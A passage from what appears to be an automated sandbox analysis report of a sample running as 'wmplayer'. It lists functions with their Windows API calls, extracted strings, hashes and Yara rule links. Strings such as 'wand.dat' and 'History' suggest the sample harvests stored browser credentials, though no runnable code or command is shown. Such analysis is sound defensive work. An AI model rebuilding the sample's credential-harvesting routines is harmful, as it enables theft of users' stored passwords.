                                                                                            • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                            Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                            • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                            • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy
                                                                                            • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                            • API String ID: 3510742995-272990098
                                                                                            • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                            • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                            • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                            • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                            Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0044A6EB
                                                                                            • memset.MSVCRT ref: 0044A6FB
                                                                                            • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                            • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpymemset
                                                                                            • String ID: gj
                                                                                            • API String ID: 1297977491-4203073231
                                                                                            • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                            • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                            • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                            • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                            Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                            • free.MSVCRT ref: 0040E9D3
                                                                                              • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@$free
                                                                                            • String ID:
                                                                                            • API String ID: 2241099983-0
                                                                                            • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                            • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                            • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                                                            • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                            Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                            • malloc.MSVCRT ref: 004174BD
                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                            • free.MSVCRT ref: 004174E4
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                            • String ID:
                                                                                            • API String ID: 4053608372-0
                                                                                            • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                            • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                            • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                                                            • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                            Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • GetParent.USER32(?), ref: 0040D453
                                                                                            • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                            • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Rect$ClientParentPoints
                                                                                            • String ID:
                                                                                            • API String ID: 4247780290-0
                                                                                            • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                            • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                            • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                            • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                            Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                            • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                            • memset.MSVCRT ref: 004450CD
                                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                              • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                            • String ID:
                                                                                            • API String ID: 1471605966-0
                                                                                            • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                            • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                            • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                                                            • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                            Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • wcscpy.MSVCRT ref: 0044475F
                                                                                            • wcscat.MSVCRT ref: 0044476E
                                                                                            • wcscat.MSVCRT ref: 0044477F
                                                                                            • wcscat.MSVCRT ref: 0044478E
                                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                              • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                                                              • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                            • String ID: \StringFileInfo\
                                                                                            • API String ID: 102104167-2245444037
                                                                                            • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                            • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                            • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                            • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                            Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@
                                                                                            • String ID:
                                                                                            • API String ID: 613200358-0
                                                                                            • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                            • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                            • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                            • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                            Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: _memicmpwcslen
                                                                                            • String ID: @@@@$History
                                                                                            • API String ID: 1872909662-685208920
                                                                                            • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                            • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                                                            • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                                                            • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                                                            Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 004100FB
                                                                                            • memset.MSVCRT ref: 00410112
                                                                                              • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                              • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                            • _snwprintf.MSVCRT ref: 00410141
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                            • String ID: </%s>
                                                                                            • API String ID: 3400436232-259020660
                                                                                            • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                            • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                            • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                            • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                            Function 0040D553 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040D58D
                                                                                            • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                            • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ChildEnumTextWindowWindowsmemset
                                                                                            • String ID: caption
                                                                                            • API String ID: 1523050162-4135340389
                                                                                            • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                            • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                            • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                            • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                            Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                              • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                            • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                            • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                            • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                            • String ID: MS Sans Serif
                                                                                            • API String ID: 210187428-168460110
                                                                                            • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                            • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                            • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                            • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                            Function 0041D893 Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041D8A6
                                                                                            • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8BC
                                                                                            • memcmp.MSVCRT(?,?,00000030,?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041D8CB
                                                                                            • memcmp.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,00000000), ref: 0041D913
                                                                                            • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D92E
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$memcmp
                                                                                            • String ID:
                                                                                            • API String ID: 3384217055-0
                                                                                            • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                            • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                                                                                            • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                                                                                            • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                                                                                            Function 00412A2A Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$memcpy
                                                                                            • String ID:
                                                                                            • API String ID: 368790112-0
                                                                                            • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                            • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                                                                                            • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                                                                                            • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                                                                                            Function 0042EB92 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 133COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                                                                                            • memcpy.MSVCRT(?,?,?), ref: 0042EC7A
                                                                                            Strings
                                                                                            • virtual tables may not be altered, xrefs: 0042EBD2
                                                                                            • Cannot add a column to a view, xrefs: 0042EBE8
                                                                                            • sqlite_altertab_%s, xrefs: 0042EC4C
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpymemset
                                                                                            • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                                                            • API String ID: 1297977491-2063813899
                                                                                            • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                            • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                                                                                            • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                                                                                            • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                                                                                            Function 004055C5 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 122COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040560C
                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                              • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                            • String ID: *.*$dat$wand.dat
                                                                                            • API String ID: 2618321458-1828844352
                                                                                            • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                            • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                            • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                            • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                            Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00412057
                                                                                              • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                            • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                            • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                            • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                            • String ID:
                                                                                            • API String ID: 3550944819-0
                                                                                            • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                            • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                            • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                            • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                            Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • free.MSVCRT ref: 0040F561
                                                                                            • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                            • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy$free
                                                                                            • String ID: g4@
                                                                                            • API String ID: 2888793982-2133833424
                                                                                            • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                            • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                            • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                            • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                            Function 0041298C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129CF
                                                                                            • memcpy.MSVCRT(?,?,00000040,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 004129F9
                                                                                            • memcpy.MSVCRT(?,?,00000013,00000001,0044EB0C,?,?,004131CA,?,0044EB0C), ref: 00412A1D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000D.00000002.2210414978.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_13_2_400000_wmplayer.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy
                                                                                            • String ID: @
